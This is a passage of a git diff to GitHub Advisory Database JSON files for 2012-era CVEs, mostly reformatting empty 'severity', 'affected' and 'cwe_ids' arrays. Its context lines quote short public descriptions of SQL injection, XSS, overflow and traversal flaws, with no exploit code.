b/advisories/unreviewed/2022/05/GHSA-3w6q-chqr-4j8j/GHSA-3w6q-chqr-4j8j.json @@ -7,12 +7,8 @@ "CVE-2012-4089" ], "details": "MCTOOLS in the fabric interconnect in Cisco Unified Computing System (UCS) allows local users to execute arbitrary Baseboard Management Controller (BMC) commands by leveraging (1) local, (2) shell-level, or (3) debug-level privileges at the operating-system layer, aka Bug ID CSCtg76239.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3wqx-wh6r-cf85/GHSA-3wqx-wh6r-cf85.json b/advisories/unreviewed/2022/05/GHSA-3wqx-wh6r-cf85/GHSA-3wqx-wh6r-cf85.json index ea301d3c8a6..99974aeb7eb 100644 --- a/advisories/unreviewed/2022/05/GHSA-3wqx-wh6r-cf85/GHSA-3wqx-wh6r-cf85.json +++ b/advisories/unreviewed/2022/05/GHSA-3wqx-wh6r-cf85/GHSA-3wqx-wh6r-cf85.json @@ -7,12 +7,8 @@ "CVE-2012-2026" ], "details": "Adobe Illustrator before CS6 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-0780, CVE-2012-2023, CVE-2012-2024, and CVE-2012-2025.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3x25-57q8-33g5/GHSA-3x25-57q8-33g5.json b/advisories/unreviewed/2022/05/GHSA-3x25-57q8-33g5/GHSA-3x25-57q8-33g5.json index 3b7e7d2fe6e..559c1091fb3 100644 --- a/advisories/unreviewed/2022/05/GHSA-3x25-57q8-33g5/GHSA-3x25-57q8-33g5.json +++ b/advisories/unreviewed/2022/05/GHSA-3x25-57q8-33g5/GHSA-3x25-57q8-33g5.json @@ -7,12 +7,8 @@ "CVE-2012-1462" ], "details": "The ZIP file parser in AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, Norman Antivirus 6.06.12, Sophos Anti-Virus 4.61.0, and AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11 allows remote attackers to bypass malware detection via a ZIP file containing an invalid block of data at the beginning. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ZIP parser implementations.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3x2r-3xr4-4cc3/GHSA-3x2r-3xr4-4cc3.json b/advisories/unreviewed/2022/05/GHSA-3x2r-3xr4-4cc3/GHSA-3x2r-3xr4-4cc3.json index 4ba091c2b73..d1b88ca1897 100644 --- a/advisories/unreviewed/2022/05/GHSA-3x2r-3xr4-4cc3/GHSA-3x2r-3xr4-4cc3.json +++ b/advisories/unreviewed/2022/05/GHSA-3x2r-3xr4-4cc3/GHSA-3x2r-3xr4-4cc3.json @@ -7,12 +7,8 @@ "CVE-2012-3271" ], "details": "Unspecified vulnerability on the HP Integrated Lights-Out 3 (aka iLO3) with firmware before 1.50 and Integrated Lights-Out 4 (aka iLO4) with firmware before 1.13 allows remote attackers to obtain sensitive information via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3xcj-9jh4-h55x/GHSA-3xcj-9jh4-h55x.json b/advisories/unreviewed/2022/05/GHSA-3xcj-9jh4-h55x/GHSA-3xcj-9jh4-h55x.json index db2c578bad5..01bc70aed48 100644 --- a/advisories/unreviewed/2022/05/GHSA-3xcj-9jh4-h55x/GHSA-3xcj-9jh4-h55x.json +++ b/advisories/unreviewed/2022/05/GHSA-3xcj-9jh4-h55x/GHSA-3xcj-9jh4-h55x.json @@ -7,12 +7,8 @@ "CVE-2012-3950" ], "details": "The Intrusion Prevention System (IPS) feature in Cisco IOS 12.3 through 12.4 and 15.0 through 15.2, in certain configurations of enabled categories and missing signatures, allows remote attackers to cause a denial of service (device reload) via DNS packets, aka Bug ID CSCtw55976.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-42fx-xh6m-j2c4/GHSA-42fx-xh6m-j2c4.json b/advisories/unreviewed/2022/05/GHSA-42fx-xh6m-j2c4/GHSA-42fx-xh6m-j2c4.json index 44d147302df..726fbc0bba2 100644 --- a/advisories/unreviewed/2022/05/GHSA-42fx-xh6m-j2c4/GHSA-42fx-xh6m-j2c4.json +++ b/advisories/unreviewed/2022/05/GHSA-42fx-xh6m-j2c4/GHSA-42fx-xh6m-j2c4.json @@ -7,12 +7,8 @@ "CVE-2012-2705" ], "details": "The filter_titles function in the Smart Breadcrumb module 6.x-1.x before 6.x-1.3 for Drupal does not properly convert a title to plain-text, which allows remote authenticated users with create or edit node permissions to conduct cross-site scripting (XSS) attacks via the title parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-43r8-6qx5-w655/GHSA-43r8-6qx5-w655.json b/advisories/unreviewed/2022/05/GHSA-43r8-6qx5-w655/GHSA-43r8-6qx5-w655.json index b68183f4a2c..bedb497dd61 100644 --- a/advisories/unreviewed/2022/05/GHSA-43r8-6qx5-w655/GHSA-43r8-6qx5-w655.json +++ b/advisories/unreviewed/2022/05/GHSA-43r8-6qx5-w655/GHSA-43r8-6qx5-w655.json @@ -7,12 +7,8 @@ "CVE-2012-0994" ], "details": "SQL injection vulnerability in the Manage Albums feature in zp-core/admin-albumsort.php in ZENphoto 1.4.2 allows remote authenticated users to execute arbitrary SQL commands via the sortableList parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-43rc-vwh5-26j7/GHSA-43rc-vwh5-26j7.json b/advisories/unreviewed/2022/05/GHSA-43rc-vwh5-26j7/GHSA-43rc-vwh5-26j7.json index 8561e5094d1..f3c86b3f3ba 100644 --- a/advisories/unreviewed/2022/05/GHSA-43rc-vwh5-26j7/GHSA-43rc-vwh5-26j7.json +++ b/advisories/unreviewed/2022/05/GHSA-43rc-vwh5-26j7/GHSA-43rc-vwh5-26j7.json @@ -7,12 +7,8 @@ "CVE-2012-2567" ], "details": "The Xelex MobileTrack application 2.3.7 and earlier for Android uses hardcoded credentials, which allows remote attackers to obtain sensitive information via an unencrypted (1) FTP or (2) HTTP session.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4426-49xv-wxg5/GHSA-4426-49xv-wxg5.json b/advisories/unreviewed/2022/05/GHSA-4426-49xv-wxg5/GHSA-4426-49xv-wxg5.json index c598253ed8d..927483b0d67 100644 --- a/advisories/unreviewed/2022/05/GHSA-4426-49xv-wxg5/GHSA-4426-49xv-wxg5.json +++ b/advisories/unreviewed/2022/05/GHSA-4426-49xv-wxg5/GHSA-4426-49xv-wxg5.json @@ -7,12 +7,8 @@ "CVE-2012-2090" ], "details": "Multiple format string vulnerabilities in FlightGear 2.6 and earlier and SimGear 2.6 and earlier allow user-assisted remote attackers to cause a denial of service and possibly execute arbitrary code via format string specifiers in certain data chunk values in an aircraft xml model to (1) fgfs/flightgear/src/Cockpit/panel.cxx or (2) fgfs/flightgear/src/Network/generic.cxx, or (3) a scene graph model to simgear/simgear/scene/model/SGText.cxx.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-44hv-hvc6-8h2r/GHSA-44hv-hvc6-8h2r.json b/advisories/unreviewed/2022/05/GHSA-44hv-hvc6-8h2r/GHSA-44hv-hvc6-8h2r.json index 24016f242ad..cb8554c8db4 100644 --- a/advisories/unreviewed/2022/05/GHSA-44hv-hvc6-8h2r/GHSA-44hv-hvc6-8h2r.json +++ b/advisories/unreviewed/2022/05/GHSA-44hv-hvc6-8h2r/GHSA-44hv-hvc6-8h2r.json @@ -7,12 +7,8 @@ "CVE-2012-2410" ], "details": "Buffer overflow in RealNetworks RealPlayer before 15.0.6.14, RealPlayer SP 1.0 through 1.1.5, and Mac RealPlayer before 12.0.1.1750 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted RealMedia file, a different vulnerability than CVE-2012-2409.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-44mf-mmxh-h2w7/GHSA-44mf-mmxh-h2w7.json b/advisories/unreviewed/2022/05/GHSA-44mf-mmxh-h2w7/GHSA-44mf-mmxh-h2w7.json index 8d6b4bad8fc..06c3e23fab9 100644 --- a/advisories/unreviewed/2022/05/GHSA-44mf-mmxh-h2w7/GHSA-44mf-mmxh-h2w7.json +++ b/advisories/unreviewed/2022/05/GHSA-44mf-mmxh-h2w7/GHSA-44mf-mmxh-h2w7.json @@ -7,12 +7,8 @@ "CVE-2012-2915" ], "details": "Stack-based buffer overflow in Lattice Semiconductor PAC-Designer 6.2.1344 allows remote attackers to execute arbitrary code via a long string in a Value tag in a SymbolicSchematicData definition tag in PAC Design (.pac) file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-44wq-5x49-35cx/GHSA-44wq-5x49-35cx.json b/advisories/unreviewed/2022/05/GHSA-44wq-5x49-35cx/GHSA-44wq-5x49-35cx.json index 43c96464ee2..8033c8122ae 100644 --- a/advisories/unreviewed/2022/05/GHSA-44wq-5x49-35cx/GHSA-44wq-5x49-35cx.json +++ b/advisories/unreviewed/2022/05/GHSA-44wq-5x49-35cx/GHSA-44wq-5x49-35cx.json @@ -7,12 +7,8 @@ "CVE-2012-1899" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in webfolio/admin/users/edit in Webfolio CMS 1.1.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) First name, (2) Last name or (3) Email (required) fields.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4537-mgq5-cjx2/GHSA-4537-mgq5-cjx2.json b/advisories/unreviewed/2022/05/GHSA-4537-mgq5-cjx2/GHSA-4537-mgq5-cjx2.json index 7ad46358b80..6253f2a149f 100644 --- a/advisories/unreviewed/2022/05/GHSA-4537-mgq5-cjx2/GHSA-4537-mgq5-cjx2.json +++ b/advisories/unreviewed/2022/05/GHSA-4537-mgq5-cjx2/GHSA-4537-mgq5-cjx2.json @@ -7,12 +7,8 @@ "CVE-2012-2708" ], "details": "Cross-site scripting (XSS) vulnerability in the _hosting_task_log_table function in modules/hosting/task/hosting_task.module in the Hostmaster (Aegir) module 6.x-1.x before 6.x-1.9 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via a Drush log message in a provision task log.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-464x-pxv9-7m7h/GHSA-464x-pxv9-7m7h.json b/advisories/unreviewed/2022/05/GHSA-464x-pxv9-7m7h/GHSA-464x-pxv9-7m7h.json index edfb4895a57..f1b8bde46b1 100644 --- a/advisories/unreviewed/2022/05/GHSA-464x-pxv9-7m7h/GHSA-464x-pxv9-7m7h.json +++ b/advisories/unreviewed/2022/05/GHSA-464x-pxv9-7m7h/GHSA-464x-pxv9-7m7h.json @@ -7,12 +7,8 @@ "CVE-2012-2058" ], "details": "The Ubercart Payflow module for Drupal does not use a secure token, which allows remote attackers to forge payments via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-468q-q36v-q9gc/GHSA-468q-q36v-q9gc.json b/advisories/unreviewed/2022/05/GHSA-468q-q36v-q9gc/GHSA-468q-q36v-q9gc.json index 21c1470860a..255e30eeb42 100644 --- a/advisories/unreviewed/2022/05/GHSA-468q-q36v-q9gc/GHSA-468q-q36v-q9gc.json +++ b/advisories/unreviewed/2022/05/GHSA-468q-q36v-q9gc/GHSA-468q-q36v-q9gc.json @@ -7,12 +7,8 @@ "CVE-2012-1631" ], "details": "Cross-site request forgery (CSRF) vulnerability in the Admin:hover module for Drupal allows remote attackers to hijack the authentication of administrators for requests that unpublish all nodes, and possibly other actions, via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-46qx-wwvq-35pg/GHSA-46qx-wwvq-35pg.json b/advisories/unreviewed/2022/05/GHSA-46qx-wwvq-35pg/GHSA-46qx-wwvq-35pg.json index e4aade91242..9148acbe22c 100644 --- a/advisories/unreviewed/2022/05/GHSA-46qx-wwvq-35pg/GHSA-46qx-wwvq-35pg.json +++ b/advisories/unreviewed/2022/05/GHSA-46qx-wwvq-35pg/GHSA-46qx-wwvq-35pg.json @@ -7,12 +7,8 @@ "CVE-2012-1206" ], "details": "Multiple integer overflows in Hancom Office 2010 SE 8.5.5 allow remote attackers to execute arbitrary code via large dimension values in a (1) JPG image to the ImportGR in the JPG image filter module (HncJpeg10.flt) or (2) PNG image to the PNG image filter module (HncPng10.flt), which triggers a heap-based buffer overflow.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-47pg-9x77-9rv9/GHSA-47pg-9x77-9rv9.json b/advisories/unreviewed/2022/05/GHSA-47pg-9x77-9rv9/GHSA-47pg-9x77-9rv9.json index 9ef34020e5d..4d1249c84e8 100644 --- a/advisories/unreviewed/2022/05/GHSA-47pg-9x77-9rv9/GHSA-47pg-9x77-9rv9.json +++ b/advisories/unreviewed/2022/05/GHSA-47pg-9x77-9rv9/GHSA-47pg-9x77-9rv9.json @@ -7,12 +7,8 @@ "CVE-2012-1029" ], "details": "SQL injection vulnerability in mobile/search/index.php in Tube Ace (Adult PHP Tube Script) 1.6 allows remote attackers to execute arbitrary SQL commands via the q parameter. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-47x7-6hxv-jc24/GHSA-47x7-6hxv-jc24.json b/advisories/unreviewed/2022/05/GHSA-47x7-6hxv-jc24/GHSA-47x7-6hxv-jc24.json index 8c5b6313f8f..1bbf334556f 100644 --- a/advisories/unreviewed/2022/05/GHSA-47x7-6hxv-jc24/GHSA-47x7-6hxv-jc24.json +++ b/advisories/unreviewed/2022/05/GHSA-47x7-6hxv-jc24/GHSA-47x7-6hxv-jc24.json @@ -7,12 +7,8 @@ "CVE-2012-0703" ], "details": "Open redirect vulnerability in Information Services Framework (ISF) in IBM InfoSphere Information Server 8.1, 8.5 before FP3, and 8.7 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-48w5-fx89-4hg4/GHSA-48w5-fx89-4hg4.json b/advisories/unreviewed/2022/05/GHSA-48w5-fx89-4hg4/GHSA-48w5-fx89-4hg4.json index 91be68a7057..98962f79366 100644 --- a/advisories/unreviewed/2022/05/GHSA-48w5-fx89-4hg4/GHSA-48w5-fx89-4hg4.json +++ b/advisories/unreviewed/2022/05/GHSA-48w5-fx89-4hg4/GHSA-48w5-fx89-4hg4.json @@ -7,12 +7,8 @@ "CVE-2012-2742" ], "details": "Revelation 0.4.13-2 and earlier uses only the first 32 characters of a password followed by a sequence of zeros, which reduces the entropy and makes it easier for context-dependent attackers to crack passwords and obtain access to keys via a brute-force attack.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-49pj-5fpc-q7mf/GHSA-49pj-5fpc-q7mf.json b/advisories/unreviewed/2022/05/GHSA-49pj-5fpc-q7mf/GHSA-49pj-5fpc-q7mf.json index bdf0ee86f86..b8ead21bdf7 100644 --- a/advisories/unreviewed/2022/05/GHSA-49pj-5fpc-q7mf/GHSA-49pj-5fpc-q7mf.json +++ b/advisories/unreviewed/2022/05/GHSA-49pj-5fpc-q7mf/GHSA-49pj-5fpc-q7mf.json @@ -7,12 +7,8 @@ "CVE-2012-1032" ], "details": "Cross-site scripting (XSS) vulnerability in the Euroling SiteSeeker module 3.x before 3.4.5 for EPiServer allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-49wq-86c4-8qrv/GHSA-49wq-86c4-8qrv.json b/advisories/unreviewed/2022/05/GHSA-49wq-86c4-8qrv/GHSA-49wq-86c4-8qrv.json index 942658cec74..f4ffbc00d1b 100644 --- a/advisories/unreviewed/2022/05/GHSA-49wq-86c4-8qrv/GHSA-49wq-86c4-8qrv.json +++ b/advisories/unreviewed/2022/05/GHSA-49wq-86c4-8qrv/GHSA-49wq-86c4-8qrv.json @@ -7,12 +7,8 @@ "CVE-2012-1061" ], "details": "SQL injection vulnerability in GForge Advanced Server 6.0.0 and other versions before 6.0.1 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4cfx-p6p6-jpvw/GHSA-4cfx-p6p6-jpvw.json b/advisories/unreviewed/2022/05/GHSA-4cfx-p6p6-jpvw/GHSA-4cfx-p6p6-jpvw.json index ef52137d627..e121a419411 100644 --- a/advisories/unreviewed/2022/05/GHSA-4cfx-p6p6-jpvw/GHSA-4cfx-p6p6-jpvw.json +++ b/advisories/unreviewed/2022/05/GHSA-4cfx-p6p6-jpvw/GHSA-4cfx-p6p6-jpvw.json @@ -7,12 +7,8 @@ "CVE-2012-3309" ], "details": "Cross-site request forgery (CSRF) vulnerability in the account-creation panel in IBM InfoSphere Guardium 8.2 and earlier, when the CSRF filtering (aka csrf_status) feature is disabled, allows remote attackers to hijack the authentication of administrators for requests that create administrative accounts.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4cqw-9fwv-7gjq/GHSA-4cqw-9fwv-7gjq.json b/advisories/unreviewed/2022/05/GHSA-4cqw-9fwv-7gjq/GHSA-4cqw-9fwv-7gjq.json index 9052a372216..652a6b1699c 100644 --- a/advisories/unreviewed/2022/05/GHSA-4cqw-9fwv-7gjq/GHSA-4cqw-9fwv-7gjq.json +++ b/advisories/unreviewed/2022/05/GHSA-4cqw-9fwv-7gjq/GHSA-4cqw-9fwv-7gjq.json @@ -7,12 +7,8 @@ "CVE-2012-3730" ], "details": "Mail in Apple iOS before 6 does not properly handle reuse of Content-ID header values, which allows remote attackers to spoof attachments via a header value that was also used in a previous e-mail message, as demonstrated by a message from a different sender.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4cvm-fc9f-m7w8/GHSA-4cvm-fc9f-m7w8.json b/advisories/unreviewed/2022/05/GHSA-4cvm-fc9f-m7w8/GHSA-4cvm-fc9f-m7w8.json index 028b309ae7a..f89142f989c 100644 --- a/advisories/unreviewed/2022/05/GHSA-4cvm-fc9f-m7w8/GHSA-4cvm-fc9f-m7w8.json +++ b/advisories/unreviewed/2022/05/GHSA-4cvm-fc9f-m7w8/GHSA-4cvm-fc9f-m7w8.json @@ -7,12 +7,8 @@ "CVE-2012-2388" ], "details": "The GMP Plugin in strongSwan 4.2.0 through 4.6.3 allows remote attackers to bypass authentication via a (1) empty or (2) zeroed RSA signature, aka \"RSA signature verification vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4cvv-jv4x-4gv8/GHSA-4cvv-jv4x-4gv8.json b/advisories/unreviewed/2022/05/GHSA-4cvv-jv4x-4gv8/GHSA-4cvv-jv4x-4gv8.json index e65ba7addf6..12d1a418361 100644 --- a/advisories/unreviewed/2022/05/GHSA-4cvv-jv4x-4gv8/GHSA-4cvv-jv4x-4gv8.json +++ b/advisories/unreviewed/2022/05/GHSA-4cvv-jv4x-4gv8/GHSA-4cvv-jv4x-4gv8.json @@ -7,12 +7,8 @@ "CVE-2012-4031" ], "details": "Multiple directory traversal vulnerabilities in src/acloglogin.php in Wangkongbao CNS-1000 and 1100 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) lang or (2) langid cookie to port 85.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4cwx-j38m-p4pm/GHSA-4cwx-j38m-p4pm.json b/advisories/unreviewed/2022/05/GHSA-4cwx-j38m-p4pm/GHSA-4cwx-j38m-p4pm.json index 9888c7f74f7..be109e1f1e9 100644 --- a/advisories/unreviewed/2022/05/GHSA-4cwx-j38m-p4pm/GHSA-4cwx-j38m-p4pm.json +++ b/advisories/unreviewed/2022/05/GHSA-4cwx-j38m-p4pm/GHSA-4cwx-j38m-p4pm.json @@ -7,12 +7,8 @@ "CVE-2012-1065" ], "details": "Insecure method vulnerability in TuxScripting.dll in the TuxSystem ActiveX control in 2X ApplicationServer 10.1 Build 1224 allows remote attackers to create or overwrite arbitrary files via the ExportSettings method.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4f8g-r594-5rqr/GHSA-4f8g-r594-5rqr.json b/advisories/unreviewed/2022/05/GHSA-4f8g-r594-5rqr/GHSA-4f8g-r594-5rqr.json index 13fe9b3e182..0cbd84b0614 100644 --- a/advisories/unreviewed/2022/05/GHSA-4f8g-r594-5rqr/GHSA-4f8g-r594-5rqr.json +++ b/advisories/unreviewed/2022/05/GHSA-4f8g-r594-5rqr/GHSA-4f8g-r594-5rqr.json @@ -7,12 +7,8 @@ "CVE-2012-3122" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 8 and 9 allows local users to affect confidentiality and integrity via unknown vectors related to sort.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-4fmg-3w8m-vwwr/GHSA-4fmg-3w8m-vwwr.json b/advisories/unreviewed/2022/05/GHSA-4fmg-3w8m-vwwr/GHSA-4fmg-3w8m-vwwr.json index c95b37410fd..e82e4b3f0e8 100644 --- a/advisories/unreviewed/2022/05/GHSA-4fmg-3w8m-vwwr/GHSA-4fmg-3w8m-vwwr.json +++ b/advisories/unreviewed/2022/05/GHSA-4fmg-3w8m-vwwr/GHSA-4fmg-3w8m-vwwr.json @@ -7,12 +7,8 @@ "CVE-2012-0852" ], "details": "The adpcm_decode_frame function in adpcm.c in libavcodec in FFmpeg before 0.9.1 and in Libav 0.5.x before 0.5.9, 0.6.x before 0.6.6, 0.7.x before 0.7.6, and 0.8.x before 0.8.3 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via an ADPCM file with the number of channels not equal to two.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4gp3-xg6h-2whj/GHSA-4gp3-xg6h-2whj.json b/advisories/unreviewed/2022/05/GHSA-4gp3-xg6h-2whj/GHSA-4gp3-xg6h-2whj.json index 3240e4e36ce..e7a989b6359 100644 --- a/advisories/unreviewed/2022/05/GHSA-4gp3-xg6h-2whj/GHSA-4gp3-xg6h-2whj.json +++ b/advisories/unreviewed/2022/05/GHSA-4gp3-xg6h-2whj/GHSA-4gp3-xg6h-2whj.json @@ -7,12 +7,8 @@ "CVE-2011-5207" ], "details": "Cross-site scripting (XSS) vulnerability in admin/OptionsPostsList.php in the TheCartPress plugin for WordPress before 1.1.6 before 2011-12-31 allows remote attackers to inject arbitrary web script or HTML via the tcp_name_post_XXXXX parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4hg4-h2c8-wx99/GHSA-4hg4-h2c8-wx99.json b/advisories/unreviewed/2022/05/GHSA-4hg4-h2c8-wx99/GHSA-4hg4-h2c8-wx99.json index 8ce9d0581ce..5a45694ae63 100644 --- a/advisories/unreviewed/2022/05/GHSA-4hg4-h2c8-wx99/GHSA-4hg4-h2c8-wx99.json +++ b/advisories/unreviewed/2022/05/GHSA-4hg4-h2c8-wx99/GHSA-4hg4-h2c8-wx99.json @@ -7,12 +7,8 @@ "CVE-2012-2227" ], "details": "Directory traversal vulnerability in update/index.php in PluXml before 5.1.6 allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the default_lang parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4hp4-89vv-6g9f/GHSA-4hp4-89vv-6g9f.json b/advisories/unreviewed/2022/05/GHSA-4hp4-89vv-6g9f/GHSA-4hp4-89vv-6g9f.json index 6d2da1b9f07..e9532a9244d 100644 --- a/advisories/unreviewed/2022/05/GHSA-4hp4-89vv-6g9f/GHSA-4hp4-89vv-6g9f.json +++ b/advisories/unreviewed/2022/05/GHSA-4hp4-89vv-6g9f/GHSA-4hp4-89vv-6g9f.json @@ -7,12 +7,8 @@ "CVE-2012-0727" ], "details": "SQL injection vulnerability in IBM Maximo Asset Management 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4hqq-6fv5-q77v/GHSA-4hqq-6fv5-q77v.json b/advisories/unreviewed/2022/05/GHSA-4hqq-6fv5-q77v/GHSA-4hqq-6fv5-q77v.json index 44f86fcc77f..2bada001c9e 100644 --- a/advisories/unreviewed/2022/05/GHSA-4hqq-6fv5-q77v/GHSA-4hqq-6fv5-q77v.json +++ b/advisories/unreviewed/2022/05/GHSA-4hqq-6fv5-q77v/GHSA-4hqq-6fv5-q77v.json @@ -7,12 +7,8 @@ "CVE-2012-2208" ], "details": "Directory traversal vulnerability in upgrade.php in Piwigo before 2.3.4 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-4jv2-g4w2-66wc/GHSA-4jv2-g4w2-66wc.json 